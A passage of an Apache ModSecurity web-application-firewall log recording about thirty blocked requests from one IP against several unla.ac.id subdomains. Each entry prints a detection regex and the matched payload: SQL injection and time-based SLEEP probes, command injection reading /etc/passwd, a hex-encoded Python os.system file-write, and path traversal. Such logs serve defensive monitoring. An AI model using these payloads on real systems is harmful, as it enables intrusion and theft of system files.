"ZO11kMCo-f0AAAUR88UAAABI"]
[Tue Aug 29 11:35:28.312476 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAUbg3EAAABQ"]
[Tue Aug 29 11:35:28.326882 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11kMCo-f0AAAVRxfMAAAAQ"]
[Tue Aug 29 11:35:28.332748 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11kMCo-f0AAAN5YIsAAAAN"]
[Tue Aug 29 11:35:28.337907 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11kMCo-f0AAAVoCBoAAAAY"]
[Tue Aug 29 11:35:28.347948 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAASI0G4AAAAG"]
[Tue Aug 29 11:35:28.348293 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAASPDQ8AAAAS"]
[Tue Aug 29 11:35:29.299606 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAASEJawAAAAE"]
[Tue Aug 29 11:35:29.301026 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUR88YAAABI"]
[Tue Aug 29 11:35:29.305587 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUUZ@0AAABK"]
[Tue Aug 29 11:35:29.309847 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAN5YIwAAAAN"]
[Tue Aug 29 11:35:29.320049 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUKhCoAAABC"]
[Tue Aug 29 11:35:29.337189 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVPX5UAAAAF"]
[Tue Aug 29 11:35:29.345553 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVsUc0AAAAb"]
[Tue Aug 29 11:35:29.350440 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kcCo-f0AAASI0HAAAAAG"]
[Tue Aug 29 11:35:30.311673 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAT2JTwAAAAz"]
[Tue Aug 29 11:35:30.345907 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAVr@SsAAAAZ"]
[Tue Aug 29 11:35:30.349638 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUUZ@8AAABK"]
[Tue Aug 29 11:35:30.359631 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAATWYVEAAAAa"]
[Tue Aug 29 11:35:30.383252 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAVRxfcAAAAQ"]
[Tue Aug 29 11:35:30.420702 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ksCo-f0AAASEJa4AAAAE"]
[Tue Aug 29 11:35:31.392133 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11k8Co-f0AAAUJI1cAAABB"]
[Tue Aug 29 11:35:31.411483 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAASEJa8AAAAE"]
[Tue Aug 29 11:35:31.441627 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11k8Co-f0AAAV6LBgAAAAI"]
[Tue Aug 29 11:35:32.300772 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVPX5gAAAAF"]
[Tue Aug 29 11:35:32.304331 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASI0HYAAAAG"]
[Tue Aug 29 11:35:32.305241 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAN5YJQAAAAN"]
[Tue Aug 29 11:35:32.312069 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAUKhC8AAABC"]
[Tue Aug 29 11:35:32.317015 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAASOUs0AAAAR"]
[Tue Aug 29 11:35:32.318853 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAT2JUIAAAAz"]
[Tue Aug 29 11:35:32.320116 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVRxfkAAAAQ"]
[Tue Aug 29 11:35:32.320367 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVoCCIAAAAY"]
[Tue Aug 29 11:35:32.329282 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUbg3kAAABQ"]
[Tue Aug 29 11:35:32.332880 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUKhDAAAABC"]
